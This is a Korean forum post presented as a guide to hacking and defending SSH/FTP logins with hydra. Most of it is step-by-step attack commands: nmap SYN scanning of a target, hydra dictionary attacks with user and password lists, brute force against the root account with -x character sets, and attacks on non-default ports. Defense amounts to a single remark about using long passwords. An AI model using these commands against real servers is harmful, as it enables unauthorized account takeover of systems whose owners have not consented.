[정보] SSH/FTP 서버 hydra를 이용한 아이디 해킹 및 방어를 위해 정보
[정보] SSH/FTP 서버 hydra를 이용한 아이디 해킹 및 방어를 위해본문
1. 대상 싸이트 조회
(1) 대상 싸이트 IP 확인하기
형식 : ping 도메인
예시 : ping test.com
(2) 열린 포트 여부 확인하기
형식 : nmap –sS IP
예시 : nmap –sS 192.168.0.100
2. 사전 파일 공격
-L 과 -P 옵션으로 사전파일을 이용해서 공격
많이 사용되는 단어를 모아서 아이디 및 패스워드 사전을 파일로 만들어서
무자별 대입함. 사전파일은 인터넷을 검색해서 구할수 있음
형식: hydra –L [아이디 사전파일] –P [비밀번호 사전파일] [대상 IP] ssh –V -f
# hydra -L user.txt -P pass.txt 192.168.0.100 ssh(또는 ftp) -V –f
아이디는 고정해 놓고 비밀번호만 사전 파일로 무차별 대입할 경우
형식 : hydra –l [고정 아이디] –P [비밀번호 사전파일] [대상 IP] ssh –V -f
# hydra –l root –P pass.txt 192.168.0.100 ssh(또는 ftp) -V –f
3. 순차 대입 공격
-x 옵션으로 비밀번호를 순차대입법으로 공격함.
-x 옵션 형식 : -x 옵션 다음에 숫자1:숫자2:a(A1특수문자)
숫자1은 최소자리수 / 숫자2는 최대자리수 / a 는 소문자 대표. a~z 전체를 의미함
/ A 는 대문자 대표. A~Z 전체를 의미함 / 1 은 숫자 대표. 0~9 전체를 의미함 /
특수문자는 각자 사용함.
# hydra -l root -x 4:4:a1 192.168.0.100 ssh(또는 ftp) -V –f
-x 옵션 예시)
1:5:a1 → 한자리 부터 5자리까지 소문자와 숫자를 조합해서 무차별 대입
6:6:1$ → 6자리로만 숫자와 특수문자$ 을 조합해서 무차별 대입
4:5:A1 → 4자리부터 5자리까지 대문자와 숫자를 조합해서 무차별 대입함
4. 수동 포트 옵션
공격 대상 PC의 서비스 포트가 디폴트가 아닌 경우 사용함.
형식 : -s [포트번호]
# hydra –s 3677 –l root –P pass.txt 192.168.0.100 ssh(또는 ftp) –V –f
# hydra –s 11175 –l root –x 4:5:A1 192.168.0.100 ssh(또는 ftp) -V -f
패스워드 길게 만들면 그래도 조금이나만 도움이 될것 같죠..
1
댓글 1개
해킹엔 관심이 없는 터라 아쉽습니다.